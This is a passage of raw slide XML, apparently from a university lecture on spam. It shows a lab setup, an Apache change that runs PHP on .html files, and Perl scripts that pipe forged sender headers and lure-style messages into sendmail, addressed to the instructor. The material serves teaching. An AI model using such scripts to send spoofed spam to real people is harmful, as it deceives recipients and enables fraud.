            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>MTA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Innocent Client:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>IP: 128.4.129.132</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>OS: Max OS X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Web browser: Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Email list provider:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>emailer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="16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128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PHP5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sz="1800" dirty="0" smtClean="0"/>
              <a:t>Install PHP5-CLI package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CLI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>may locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>syntax errors in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>scripts by simply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>using   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yourscript.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The CLI executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Inside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cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2/mods-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.conf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>by adding 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smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "\.html$"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SetHandler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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; 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2000" b="1" dirty="0" smtClean="0"/>
              <a:t>after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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p[345]?|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>t|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)$"&gt; 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 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 err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SetHandler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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; 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800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enable application of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP preprocessor to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as well </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Ordinarily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>web server would invoke the PHP preprocessor only on the files that end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.php5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800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000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRP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85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Spam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Executable by Perl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="12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open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SENDMAIL, "|/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -t -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>oi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cutiepie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yourfriend.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> \n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "To: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "Subject: I am so lonely, please call \n\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "\n\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nYou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> may not believe this, but I know you already.";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "I promise you will not regret it if you call me at 123-456-789.\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "\n\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nIf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> you call, I will send you my photo that you will drool over. Call soon.\n"; print SENDMAIL "\n\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>close SENDMAIL; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="12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200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>open SENDMAIL, "|/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -t -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>oi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>goodbuddy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>someoutfit.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> \n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "To: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
